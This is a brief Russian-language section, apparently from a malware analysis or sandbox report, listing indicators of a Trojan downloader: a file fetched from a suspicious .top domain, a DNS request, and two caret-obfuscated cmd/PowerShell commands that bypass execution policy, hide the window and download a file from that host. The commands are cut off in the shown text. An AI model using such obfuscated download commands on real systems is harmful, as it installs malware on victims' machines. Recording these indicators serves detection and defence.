Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^ERSheLl^.^EXE^ ^-eXe^Cut^IO^NP^oli^Cy^ byP^asS -NOprofi^LE ^-WiN^d^oW^stYL^e^ ^hiDDeN^ ^(n^Ew^-oB^jE^ct sYSTeM.neT.WEBc^LI^eNt).d^o^wN^loADF^iL^e('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOw^ERSheLl^.^EXE^ ^-eXe^Cut^IO^NP^oli^Cy^ byP^asS -NOprofi^LE ^-WiN^d^oW^stYL^e^ ^hiDDeN^ ^(n^Ew^-oB^jE^ct sYSTeM.neT.WEBc^LI^eNt).d^o^wN^loADF^iL^e('http://www.doorasope.top...' (со скрытым окном)